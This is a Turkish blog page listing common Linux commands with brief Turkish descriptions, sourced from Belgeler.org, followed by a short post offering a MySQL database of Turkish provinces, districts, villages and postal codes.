autoheader – configure betiği için bir şablon başlığı oluşturur
autoreconf – Üretilmiş yapılandırma dosyalarını günceller
autorun – CDROM sürücülerini özdevinimli dosya sistemine bağlar/ayırır ve bağladıktan sonra /cdrom_dizini/autorun komutunu çalıştırır
autoscan – Öncü bir configure.in üretir
autoupdate – bir configure.in’i daha yeni bir Autoconf’a günceller
B
base64 – veriyi base64 kodlar veya kodunu çözer ve standart çıktıya basar
basename – dosya isimlerinden dizin ve soneki ayırır
bc – Keyfî duyarlılıkta hesaplama dili
bunzip2 – sıkıştırılmış dosyaları açar
bzcat – dosyaları standart çıktıda açar
bzcmp – bzip2 ile sıkıştırılmış dosyaları karşılaştırır
bzdiff – bzip2 ile sıkıştırılmış dosyaları karşılaştırır
bzegrep – bir düzenli ifade için belirtilen bzip2 sıkıştırılmış dosyalarında egrep ile arama yapar
bzfgrep – bir düzenli ifade için belirtilen bzip2 sıkıştırılmış dosyalarında fgrep ile arama yapar
bzgrep – bir düzenli ifade için belirtilen bzip2 sıkıştırılmış dosyalarında grep ile arama yapar
bzip2 – blok sıralamalı dosya sıkıştırıcı v1.0.2
bzip2recover – zarar görmüş bzip2 dosyalarındaki verileri kurtarır
C
cal – bir takvim görüntüler
cat – dosyaları birleştirir ve standart çıktıya yazar
chage – kullanıcı parolasının son kullanma tarihini değiştirir
chattr – Bir Linux genişletilmiş ikinci sürüm dosya sisteminin üzerinde dosya özniteliklerini değiştirir
chfn – kişisel bilgilerinizi değiştirir
chgrp – dosyanın grup iyeliğini değiştirir
chmod – dosya kip bitlerini değiştirir
chown – dosyanın sahibini ve grubunu değiştirir
chroot – özel kök dizini ile komut ya da etkileşimli kabuk çalıştırır
cksum – dosya içindeki baytları sayar ve sağlamasını yapar
clear – uçbirim ekranını temizler
cmp – iki dosyayı karşılaştırır
comm – sıralanmış iki dosyayı satır satır karşılaştırır
compress – verileri sıkıştırır (sürüm 4.1)
cp – dosya ve dizinleri kopyalar
crontab – bağımsız kullanıcılar için crontab dosyalarının bakımını ve işletilmesini sağlar (V3)
cryptdir – bir dizindeki bütün dosyaları şifreler
csplit – bir dosyayı bağlamsal satırlara göre bölümlere ayırır
cut – dosyaların her satırından belli bölümleri siler
D
date – sistem tarih ve saatini görüntüler veya ayarlar
dd – bir dosyayı dönüştürür ve kopyalar
decryptdir – bir dizindeki bütün dosyaları deşifre eder
df – dosya sisteminin disk alanı kullanımını gösterir
diff – iki dosya arasındaki farklılıkları bulur
diff3 – üç dosya arasındaki farkları bulur
dir – dizinlerin içindekileri listeler
dircolors – ls için renkleri ayarlar
dirname – dosya isminin sonundan dizin olmayan kısmı ayırır
dnsdomainname – sistemin DNS alan ismini gösterir
domainname – sistemin NIS/YP alan ismini atar ya da gösterir
du – yaklaşık dosya alanı kullanımı
E
echo – tek satırlık bir metin görüntüler
env – değiştirilmiş ortamda komut çalıştırır
expand – sekmeleri boşluklarla değiştirir
expr – ifadeleri değerlendirir
F
factor – sayıları asal çarpanlarına ayırır
false – hiçbir şey yapmaz, başarısız olur
fmt – paragraf metnini yeniden biçimler
fold – her satırı belirtilen genişlikten katlar
free – sistemdeki kullanılmış ve serbest belleklerle ilgili bilgi verir
G
getty – uçbirim kipini, hızını ve hat disiplinini ayarlar
groups – kullanıcının üyesi olduğu grupları basar
gunzip – sıkıştırılmış dosyaları açar
gzcat – sıkıştırılmış dosyaları standart çıktıda açar
gzip – dosyaları sıkıştırır
H
head – dosyaların ilk 10 satırını basar
hostid – konağın sayısal betimleyicisini basar
hostname – sistemin konak ismini atar ya da gösterir
I
iconv – belirtilen dosyanın karakter kodlamasını değiştirir
id – kullanıcı kimliğini basar
ifnames – C dosyalarından önişlemci komutlarını çıkarır
install – dosyaları kopyalar, özniteliklerini ayarlar
J
join – iki dosyanın satırlarını ortak bir alanda birleştir
K
kill – süreçlere sinyal gönderir veya sinyalleri listeler
killall – ismi belirtilen süreçleri sonlandırır
L
ldd – paylaşımlı kütüphane bağımlılıklarını görüntüler
link – bir dosyaya bağ oluşturmak için link işlevini çağırır
ln – dosyalar arasında bağlar oluşturur
login – Kullanıcının sisteme girişini sağlar.
logname – kullanıcının ismini basar
ls – dizinlerin içindekileri listeler
lsattr – Bir Linux genişletilmiş ikinci sürüm dosya sisteminin üzerinde dosya özniteliklerini listeler
M
man – kılavuz sayfalarını biçimler ve görüntüler
manpath – man sayfalarının aranacağı yolu gösterir
md5sum – MD5 ileti özetini hesaplar ve sınar
mkdir – dizinleri oluşturur
mkfifo – FIFO’lar (isimli borular) oluşturur
mknod – blok veya karakter özel dosyalarını oluşturur
mv – dosyaları taşır (ismini değiştirir)
N
nice – işlem önceliğini değiştirerek bir dosyayı çalıştırır
nisdomainname – sistemin NIS/YP alan ismini atar ya da gösterir
nl – dosya satırlarını numaralar
nodename – sistemin DECnet düğüm ismini atar ya da gösterir
nohup – bir komutu uçbirimsiz ve bitir sinyallerini yoksayarak çalıştırır
O
od – dosyayı sekizlik veya başka bir biçimde dökümler
P
passwd – kullanıcının parolasını günceller
paste – dosyaların satırlarını birleştirir
patch – bir yama dosyasını orjinaline uygular
pathchk – dosya isimlerinin geçerliliğini ve taşınabilirliğini sınar
pico – Pine eposta istemcisi tarzında basit bir metin düzenleyici
pinky – basit bir `finger’ uygulaması; kullanıcı bilgilerini gösterir
play – ses aygıtında herhangi bir ses dosyasını çalar
pr – metin dosyalarını yazıcıda basılacak biçime dönüştürür
printenv – ortamı tamamen veya kısmen basar
printf – veriyi biçimler ve basar
ptx – dosya içeriğini karılmış olarak basar
pwd – içinde bulunulan dizinin ismini basar
R
readlink – bir sembolik bağın değerini gösterir
rec – sesi bir ses dosyası biçiminde kaydeder
rm – dosya ve dizinleri siler
rmdir – boş dizinleri siler
rsync – rcp yerine daha hızlı ve esnek bir araç
S
scp – güvenli kopyalama (uzaktan erişimle dosya kopyalama komutu)
sdiff – iki dosya arasındaki farklılıkları bulur ve etkileşimli olarak katıştırır
seq – bir sayı dizisi basar
sha1sum – SHA1 ileti özetini hesaplar ve sınar
sha224sum – SHA224 ileti özetini hesaplar ve sınar
sha256sum – SHA256 ileti özetini hesaplar ve sınar
sha384sum – SHA384 ileti özetini hesaplar ve sınar
sha512sum – SHA512 ileti özetini hesaplar ve sınar
shred – içeriğini gizlemek bazan da silmek için dosyanın üzerine yazar
shuf – satırları rasgele karar
sleep – belli bir süre geciktirir
sort – metin dosyalarını satırlarını sıralar
split – bir dosyayı parçalara ayırır
ssh – OpenSSH SSH istemcisi (uzaktan oturum açma aracı)
stat – bir dosyanın veya dosya sisteminin durumunu gösterir
stty – uçbirim hat ayarlarını basar ve değiştirir
su – başka bir kullanıcı ve grup kimliği ile bir kabuk çalıştırır
sum – bir dosyadaki blok sayısını ve sağlama toplamını basar
sync – dosya sistemi tamponlarını boşaltır
T
tac – dosyaları ardarda sondan başa doğru basar
tail – dosyaların son kısmını basar
tee – standart girdiyi dosyaya ve standart çıktıya kopyalar
top – süreçleri gösterir
touch – dosyanın zaman damgalarını değiştirir
tr – karakterleri çevirir veya siler
true – hiçbir şey yapmaz, başarılı olur
tsort – düzgün doğrusal sıralama yapar
tty – standart girdiye bağlı terminalin dosya ismini basar
U
uname – sistem bilgilerini gösterir
uncompress – sıkıştırılmış verileri açar
unexpand – boşlukları sekmelerle değiştirir
uniq – yinelenen satırları atlar ve raporlar
unlink – bir dosya bağını silmek için unlink işlevini çağırır
uptime – sistemin ne kadar zamandır çalıştığını söyler
uucp – Unix’den Unix’e kopyalama
V
vdir – dizinlerin içindekileri listeler
X
xgettext – gettext dizgelerini kaynak dosyasından seçer
xmllint – komut satırı XML aracı
xmlto – bir XSL dönüşüm dosyasını bir XML belgesine uygular
xsltproc – komut satırı xslt işlemcisi
Y
ypdomainname – sistemin NIS/YP alan ismini atar ya da gösterir
Z
zcat – sıkıştırılmış verileri standart çıktıda açar.
Kaynak : Belgeler.org

Benzer Yazılar

• 31 Mayıs 2007 -- Linux + Squid + iptables ile Internet Yönetimi (8)
• 30 Nisan 2007 -- ubuntu üzerinde PhotoShop CS2 (0)
• 28 Mart 2007 -- Dokunmatik Ekran ve Linux XGL Çılgınlığı (1)
• 29 Ocak 2006 -- Dos Saldırları İçin (2)

19.08.2009 tarihi itibariyle PTT den alınan veritabanı ile köylerde dahil olmak üzere güncellenmiştir.

Eğer web sitesi yada program yazan biri iseniz bir çok kez Türkiye’deki tüm iller, bunların ilçeleri ve hatta mahalleleri ve köyleri posta kodları ile birlikte gerekmiş olabilir. Ek’te tüm veritabanı MySQL Query (.sql) formatında sizi bekliyor.

Download : tblililcemahallekoy

Benzer Yazılar

• 20 Şubat 2009 -- PHP Güvenlik Kılavuzu (4)
• 23 Şubat 2008 -- Inner, Outer, Left, Right, Cross(Full) Join Nedir ? (3)
• 12 Nisan 2007 -- Kısayoldan SQL Tablo Tasarımı (1)
• 28 Mart 2007 -- SQL den alınan tarih bilgisini düzenleme (2)

Benzer Yazılar

• 4 Haziran 2007 -- Tam Ekran CSS/DHTML Preloader (2)
• 12 Nisan 2007 -- Kısayoldan SQL Tablo Tasarımı (1)
• 13 Aralık 2006 -- URL String Güvenliği (0)
• 13 Aralık 2006 -- %100 Site Güvenliği (0)